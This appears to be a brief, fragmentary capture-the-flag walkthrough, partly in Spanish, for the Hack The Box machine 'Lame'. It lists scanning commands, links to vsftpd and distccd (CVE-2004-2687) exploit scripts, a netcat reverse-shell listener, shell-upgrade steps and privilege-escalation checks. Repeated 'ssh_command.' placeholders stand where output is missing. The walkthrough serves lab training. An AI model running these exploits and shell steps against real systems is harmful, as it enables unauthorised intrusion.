Lame

Lame


HTB Linux

echo “10.129.186.12 lame.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA pit 10.129.186.12 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA lame 10.129.186.12

nmap -sU -O -p- -oA lame-udp 10.129.186.12

nikto -h 10.129.186.12:80

gobuster dir -k -u http://10.129.186.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

https://github.com/Hellsender01/vsftpd_2.3.4_Exploit

No funciono

ssh_command.

https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

upgrade shell

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

find -name user.txt 2>/dev/null | xargs head -c 18; echo

uname -a

ssh_command.

find -perm -4000 2>/dev/null

ssh_command.

which nmap | xargs ls -l

ssh_command.

searchsploit samba 3 command execution

ssh_command.

smbmap -H 10.129.186.12

ssh_command.

smbclient //10.129.186.12/tmp —option=‘client min protocol=NT1’ -N

ssh_command.

smbclient //10.129.186.12/tmp -N

nc -lvnp 4444

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

ssh_command.

© 2025 Cu3rv0x